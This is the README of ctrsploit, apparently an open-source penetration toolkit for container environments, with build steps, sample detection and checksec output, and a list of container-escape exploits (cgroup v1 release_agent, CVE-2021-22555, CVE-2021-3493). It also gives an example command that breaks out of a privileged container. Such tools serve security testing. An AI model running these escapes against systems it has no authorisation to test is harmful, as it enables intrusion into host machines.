ctrsploit: A penetration toolkit for container environment

ctrsploit [kənˈteɪnər splɔɪt]

Why ctrsploit

Pre-Built Release

https://github.com/ctrsploit/ctrsploit/releases

Build by yourself

Build the target binary with Docker container toolkit

git clone https://github.com/ctrsploit/ctrsploit.git
cd ctrsploit
docker build . -t ctrsploit_builder
chmod +x build/build.sh  
# auto build
docker run -v $(pwd):/ctrsploit --rm ctrsploit_builder

or you can do it manually

...
docker run -it -v $(pwd):/ctrsploit --rm ctrsploit_builder /bin/sh
build_ctrsploit

Note：To modify the target platform, modify the OS/arch parameter string in the build/build.sh file, e.g. -osarch="linux/amd64"

Usage

Quick-Start

wget -O ctrsploit https://github.com/ctrsploit/ctrsploit/releases/download/v0.4/ctrsploit_linux_amd64 && chmod +x ctrsploit
./ctrsploit --help
NAME:
   ctrsploit - A penetration toolkit for container environment

ctrsploit is a command line ... //TODO


USAGE:
   ctrsploit [global options] command [command options] [arguments...]

COMMANDS:
   auto, a     auto gathering information, and detect vuls, and exploit // TODO
   exploit, e  run a exploit
   env, e      gather information // TODO
   help, h     Shows a list of commands or help for one command

GLOBAL OPTIONS:
   --lang value  language for the greeting (default: "english")
   --help, -h    show help (default: false)

gather information

usage

root@ctr:/# ./ctrsploit env
NAME:
   ctrsploit env - gather information

USAGE:
   ctrsploit env command [command options] [arguments...]

COMMANDS:
   where, w        detect whether you are in the container, and which type of the container
   graphdriver, g  detect graphdriver type and extend information
   cgroups, c      gather cgroup information
   help, h         Shows a list of commands or help for one command

OPTIONS:
   --help, -h  show help (default: false)

where

root@ctr:/# ./ctrsploit  env  w
INFO[0000] ===========Docker=========
.dockerenv exists: ✔
rootfs contains 'docker': ✔
cgroup contains 'docker': ✘
the mount source of /etc/hosts contains 'docker': ✔
hostname match regex ^[0-9a-f]{12}$: ✔
=> is in docker: ✔ 
INFO[0000] ===========k8s=========
/var/run/secrets/kubernetes.io exists: ✘
hostname match k8s pattern: ✘
the mount source of /etc/hosts contains 'pods': ✘
cgroup contains 'kubepods': ✘
=> is in k8s: ✘

run a exploit

root@2aa13a052102:/# ./ctrsploit e
NAME:
   ctrsploit exploit - run a exploit

USAGE:
   ctrsploit exploit command [command options] [arguments...]

COMMANDS:
   cgroupv1-release_agent, ra                       escape tech by using the notify_on_release of cgroup v1
   cgroupv1-release_agent-unknown_rootfs, ra3       escape tech by using the notify_on_release of cgroup v1 without known rootfs
   help, h                                          Shows a list of commands or help for one command

OPTIONS:
   --help, -h  show help (default: false)

eg. : escape by 'cgroupv1-release_agent' tech.

root@host # docker run -ti --rm --security-opt="apparmor=unconfined" --cap-add="sys_admin" busybox
root@ctr # wget -O ctrsploit https://github.com/ctrsploit/ctrsploit/releases/download/v0.4/ctrsploit_linux_amd64 && chmod +x ctrsploit
root@ctr # ./ctrsploit e ra -c "cat /etc/hostname"

check security

Just execute ctrsploit checksec or standalone binary file checksec in the container.

[root@ctr ~]# /checksec_linux_amd64 
===========Seccomp=========
kernel supported: ✔
seccomp enabled in current container: ✘

===========Apparmor=========
Kernel Supported: ✘
Container Enabled: ✘

===========Cgroups=========
is cgroupv1: ✔
is cgroupv2: ✘

------sub systems-------
["perf_event" "memory" "net_cls" "cpuset" "blkio" "hugetlb" "files" "cpu" "cpuacct" "pids" "rdma" "freezer" "devices" "net_prio"]

--------top level subsystem----------
["rdma"

Details

env

command	alias	description
where	w	detect whether you are in the container, and which type of the container
graphdriver	g	detect graphdriver type and extend information
cgroups	c	gather cgroup information
capability	cap	show the capability of pid 1 and current process
seccomp	s	show the seccomp info
apparmor	a	show the apparmor info

exploit

exploit	alias	description
cgroupv1-release_agent	ra	escape tech by using the notify_on_release of cgroup v1
cgroupv1-release_agent-unknown_rootfs	ra3	escape tech by using the notify_on_release of cgroup v1 without known rootfs
cve-2021-22555_ubuntu18.04	22555	escape tech by using the CVE-2021-22555 (ubuntu18.04)

helper

helper	alias	description
cve-2021-3493	ubuntu-overlayfs-pe,3493	Ubuntu OverlayFS Local Privesc

checksec

Just execute ctrsploit checksec or standalone binary file checksec.

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

ctrsploit / ctrsploit

Programming Languages

Labels

Projects that are alternatives of or similar to ctrsploit